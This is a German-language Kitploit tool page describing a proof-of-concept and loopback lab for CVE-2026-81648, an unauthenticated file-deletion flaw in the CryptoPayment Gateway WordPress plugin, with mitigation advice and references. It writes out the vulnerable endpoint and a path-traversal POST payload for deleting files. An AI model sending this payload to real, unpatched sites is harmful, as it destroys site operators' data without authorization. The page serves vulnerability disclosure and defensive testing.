Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-81648 — Proof-of-Concept-Exploit und Lab für CVE-2026-81648, eine nicht authentifizierte Schwachstelle zur beliebigen Dateilöschung im WordPress-Plugin CryptoPayment Gateway. | Kitploit
Tools/GitHubGitHub/abraxas/cve-2026-81648
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationSicherheitsvirtualisierungWebsicherheitPenetrationstestsLabs & Praxis
GitHubabraxas/cve-2026-81648

CVE-2026-81648

Proof-of-Concept-Exploit und Lab für CVE-2026-81648, eine nicht authentifizierte Schwachstelle zur beliebigen Dateilöschung im WordPress-Plugin CryptoPayment Gateway.

1vor 1 TagNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Abraxas Labs — CVE-2026-81648 — WordPress

abraxaslabs.tech  ·  github.com/abraxas  ·  @abraxas_null  ·  CVE-2026-81648

CVE-2026-81648 — WordPress

WordPress — CryptoPayment Gateway 1.2.2 — Granwill

Das WordPress-Plugin CryptoPayment Gateway von 1.2.1 bis 1.2.2 führt bei einem seiner AJAX-Endpunkte keine Autorisierungsprüfung durch, wodurch nicht authentifizierte Benutzer administrative Operationen auslösen können, einschließlich des Löschens beliebiger Dateien auf dem Server, des Überschreibens der Zahlungsgateway-Konfiguration und des Auslesens gespeicherter Wallet-Anmeldedaten im Klartext.

CVECVE-2026-81648 · CVE.org
CWECWE-862
CVSSKritisch: 10.0 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProduktWordPress — CryptoPayment Gateway
Betroffen1.2.1–1.2.2
Gepatchtkein öffentlicher Patch (WPScan: kein bekannter Fix)
Authkeine (siehe Source Map)
LizenzGNU Affero GPL v3.0
Labnur 127.0.0.1 · Vendor/Client-Disclosure-Paket, kein Scanner

Advisory (aus der Source Map)

delete-file auf cryptd/ajax.php ist der Sink. HTTP ist diese PHP-Datei, nicht admin-ajax.php.


Einstieg

  • Methode: POST
  • Pfad: /wp-content/plugins/cryptopayment-gateway/vendor/cryptd/ajax.php
  • Router: Direktes POST vendor/cryptd/ajax.php function=delete-file. Nicht wp_ajax. Pfad ist DIR/uploads/ + folder + file_name (5 .. von uploads erreicht wp-content).
  • Hinweise: CVE-2026-81648 CWE-862 CryptoPayment Gateway 1.2.2. Witness POCWitness81648 verschwindet. Kein bekannter Vendor-Patch (WPScan). Wallet-Schlüssel nicht wiederherstellen.

Aufrufkette

  • GET /wp-content/poc81648/index.php expect POCWitness81648
  • POST ajax.php data={"function":"delete-file","file_name":"../../../../../poc81648/index.php","folder":""}
  • crpay_file_delete unlinks wp-content/poc81648/index.php
  • GET witness URL no POCWitness81648

Lab-Voraussetzungen

  • CryptoPayment Gateway 1.2.2
  • wp-content/poc81648/index.php gibt POCWitness81648 aus

Witness

POCWitness81648 vor dem POST vorhanden, danach nicht mehr. JSON-Erfolg ohne das Löschen ist es nicht.

Kein Erfolg

  • AJAX-JSON ohne dass die Datei verschwindet
  • POCWitness81648 wird weiterhin ausgeliefert
  • Löschen von wp-config.php
  • Auslesen von Wallet-Schlüsseln
  • Reverse Shell

Patch / Behebung

Zuerst dies tun: Es gibt keinen öffentlichen Patch. Deaktivieren Sie CryptoPayment Gateway oder blockieren Sie vendor/cryptd/ajax.php, bis eine Vendor-Version existiert.

Nach dem Upgrade verifizieren

  • Führen Sie CVE-2026-81648-Abraxas-Labs.py erneut gegen den gepatchten Build aus: Der zugeordnete Witness darf nicht erscheinen.
  • Bestätigen Sie das Vendor-Advisory / Changeset im bereitgestellten Baum (siehe Referenzen).
  • Eine WAF-Signatur ist eine Verzögerung, kein Patch.

Wenn Sie nicht sofort aktualisieren können

  • Deaktivieren oder isolieren Sie die betroffene Komponente.
  • Suchen Sie in der Produktion nach der Witness-Bedingung (neue privilegierte Benutzer, unerwartete Dateien, eingeschleuste Zeilen — was auch immer die Map dieser CVE benennt).

Reproduktion (autorisiertes Lab)

Ziel ausschließlich http://127.0.0.1:8088 (oder das Loopback, an das Sie gebunden haben). Richten Sie dieses Skript nicht auf das Internet.

root@kitploit:~
python3 CVE-2026-81648-Abraxas-Labs.py

Erfolg ist der Witness oben im Response-Body. Generisches 200-HTML ist es nicht.


Lab-Images

Loopback-Stack zur Reproduktion. Offizielle Images, sofern nicht ein Dockerfile in diesem Ordner aus dem Quellcode baut.

  • lab/docker-compose.yml
  • lab/docker-compose.override.yml
  • lab/Dockerfile
root@kitploit:~
cd lab
docker compose up --force-recreate

Binden Sie den verwundbaren Produktbaum neben Compose ein, wenn die YAML ein lokales Verzeichnis mountet (Plugin-Zip / Source-Tag aus der Versionstabelle). Veröffentlichen Sie nichts außer 127.0.0.1.


Referenzen

  • CVE-2026-81648 · NVD

  • CVE-2026-81648 · CVE.org

  • wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/

  • github.com/advisories/GHSA-9r3q-6qw8-8pm7

  • nvd.nist.gov/vuln/detail/CVE-2026-81648

  • wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898

  • Plugin-Verzeichnis: cryptopayment-gateway

  • Trac-Browser: plugins.trac.wordpress.org/cryptopayment-gateway

  • SVN-Tags: plugins.svn.wordpress.org/cryptopayment-gateway

  • Abraxas Labs: abraxaslabs.tech · github.com/abraxas · @abraxas_null


Datensätze (strukturiert)

root@kitploit:~
# CVE-2026-81648  (structured records)

- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-81648`
- CWE: CWE-862
- published: 2026-09-13T21:17:01.930

## NVD description

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

## MITRE description

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

## Affected

- Unknown CryptoPayment Gateway 1.2.1 affected

## References (JSON sources only)

- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/
- https://github.com/advisories/GHSA-9r3q-6qw8-8pm7
- https://nvd.nist.gov/vuln/detail/CVE-2026-81648
- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898

## GitHub advisory

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization...

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

Lizenz

Dieses Disclosure-Paket ist unter der GNU Affero General Public License v3.0 lizenziert. Siehe LICENSE.


Haftungsausschluss

Dieses Paket ist für den Vendor, den Seitenbetreiber und lizenzierte Labs. Das Skript kommuniziert mit 127.0.0.1. Die Verwendung gegen Systeme, die Ihnen nicht gehören, ist von Abraxas Labs nicht autorisiert. Keine Gewährleistung.

abraxaslabs.tech · github.com/abraxas · @abraxas_null

Tool herunterladen